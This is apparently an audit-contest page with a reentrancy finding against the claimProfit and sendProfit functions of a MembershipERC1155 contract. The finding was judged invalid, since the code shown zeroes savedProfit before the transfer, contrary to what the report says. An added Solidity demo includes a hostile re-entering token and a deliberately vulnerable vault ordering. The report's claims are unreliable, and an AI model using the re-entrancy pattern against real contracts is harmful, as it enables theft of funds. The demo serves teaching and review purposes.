Project: One World
NFTDeFi
15,000 USDC
Submission Details
Severity: high
Status: Invalid

Potential Reentrancy Vulnerabilities in claimProfit and sendProfit

Root Cause:
The claimProfit and sendProfit functions in the MembershipERC1155 contract lack reentrancy guards. These functions involve external calls to ERC20 tokens via safeTransfer and safeTransferFrom, which could be exploited if a malicious token contract is used.

claimProfit Function:

function claimProfit() external returns (uint256 profit) {
    profit = saveProfit(msg.sender);                     // saveProfit() is not shown on the page
    require(profit > 0, "No profit available");
    savedProfit[msg.sender] = 0;
    IERC20(currency).safeTransfer(msg.sender, profit);   // external call into the currency token
    emit Claim(msg.sender, profit);
}
  • The savedProfit is set to zero after the external call to safeTransfer.

  • A reentrancy attack could allow the attacker to call claimProfit again before savedProfit is zeroed out.

sendProfit Function:

function sendProfit(uint256 amount) external {
    uint256 _totalSupply = totalSupply;
    if (_totalSupply > 0) {
        totalProfit += (amount * ACCURACY) / _totalSupply;                // per-token profit accumulator
        IERC20(currency).safeTransferFrom(msg.sender, address(this), amount); // pulls `amount` from the caller
        emit Profit(amount);
    } else {
        IERC20(currency).safeTransferFrom(msg.sender, creator, amount);   // no holders yet: forward to creator
    }
}
  • The totalProfit is updated before the external call to safeTransferFrom.

  • A malicious token contract could exploit this ordering to manipulate the state.

Impact:

  • Financial Loss: Attackers could repeatedly drain the contract's funds by reentering the claimProfit function.

  • State Manipulation: In sendProfit, the attacker could manipulate the totalProfit calculation, affecting profit distribution to other users.

Recommendation:

  • Implement the ReentrancyGuard from OpenZeppelin and apply the nonReentrant modifier to both functions.

  • Reorder state changes to occur before external calls.

  • For claimProfit, set savedProfit[msg.sender] = 0; before the external call to safeTransfer.

  • For sendProfit, perform external calls before updating critical state variables or ensure reentrancy is not possible.
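The following is an added example written for this page; it is not code from the One World project or the MembershipERC1155 contract. It models the claim path with a hostile `currency` token whose `transfer` re-enters `claimProfit`, and deploys the vault twice: once with the ordering shown in the snippet above (`savedProfit` zeroed before the transfer) and once with the ordering the finding describes (zeroed after). `IToken`, `IVault`, `credit`, `ReenteringToken`, `Demo` and the depth cap of 3 are assumptions made for the demo; `credit` stands in for the page's `saveProfit`.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not code from the One World / MembershipERC1155 contract.
// Assumptions: IToken stands in for IERC20 + SafeERC20, credit() stands in
// for saveProfit(), and the vault is deployed with both orderings so the
// reentrant behaviour can be compared side by side.

interface IToken {
    function transfer(address to, uint256 amount) external returns (bool);
}

interface IVault {
    function claimProfit() external returns (uint256);
}

contract ProfitVault is IVault {
    IToken public immutable currency;
    bool public immutable clearLate; // true = zero savedProfit after the transfer
    mapping(address => uint256) public savedProfit;

    constructor(IToken _currency, bool _clearLate) {
        currency = _currency;
        clearLate = _clearLate;
    }

    // Hypothetical test hook: credits profit directly instead of saveProfit().
    function credit(address who, uint256 amount) external {
        savedProfit[who] += amount;
    }

    function claimProfit() external returns (uint256 profit) {
        profit = savedProfit[msg.sender];
        require(profit > 0, "No profit available");
        if (!clearLate) savedProfit[msg.sender] = 0; // ordering shown on the page
        require(currency.transfer(msg.sender, profit), "transfer failed");
        if (clearLate) savedProfit[msg.sender] = 0;  // ordering the finding describes
    }
}

// A hostile "currency": each transfer() re-enters claimProfit before returning.
// The token is also the account holding the profit, so msg.sender matches.
contract ReenteringToken is IToken {
    IVault public vault;
    uint256 public paidOut; // sum of every transfer the vault asked for
    uint256 private depth;  // bounds the recursion so the demo terminates

    function setVault(IVault _vault) external {
        vault = _vault;
    }

    function claim() external {
        vault.claimProfit();
    }

    function transfer(address, uint256 amount) external returns (bool) {
        paidOut += amount;
        if (msg.sender == address(vault) && depth < 3) {
            depth++;
            try vault.claimProfit() {} catch {} // swallow "No profit available"
            depth--;
        }
        return true;
    }
}

contract Demo {
    // Deploys each ordering, credits the token 100 units and lets it claim once.
    function run() external returns (uint256 paidCei, uint256 paidLate) {
        paidCei = simulate(false);
        paidLate = simulate(true);
    }

    function simulate(bool clearLate) internal returns (uint256) {
        ReenteringToken token = new ReenteringToken();
        ProfitVault vault = new ProfitVault(token, clearLate);
        token.setVault(vault);
        vault.credit(address(token), 100);
        token.claim();
        return token.paidOut();
    }
}
```

Calling `Demo.run()` returns `(100, 400)`. With the ordering on the page, the nested `claimProfit` reads a zeroed `savedProfit`, hits `require(profit > 0)` and reverts, so the token is paid exactly once. Only when the zeroing is moved after the transfer does each nested call re-claim the same 100 units until the depth guard stops it. Two caveats worth keeping in mind when reviewing this class of finding: the re-entry exists only because `currency` itself calls back into the vault during `transfer`, which a plain ERC20 never does; and `sendProfit` on the page likewise updates `totalProfit` before its `safeTransferFrom`, the same effect-before-interaction ordering.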

Updates

Lead Judging Commences

0xbrivan2 Lead Judge about 1 year ago
Submission Judgement Published
Invalidated
Reason: Incorrect statement
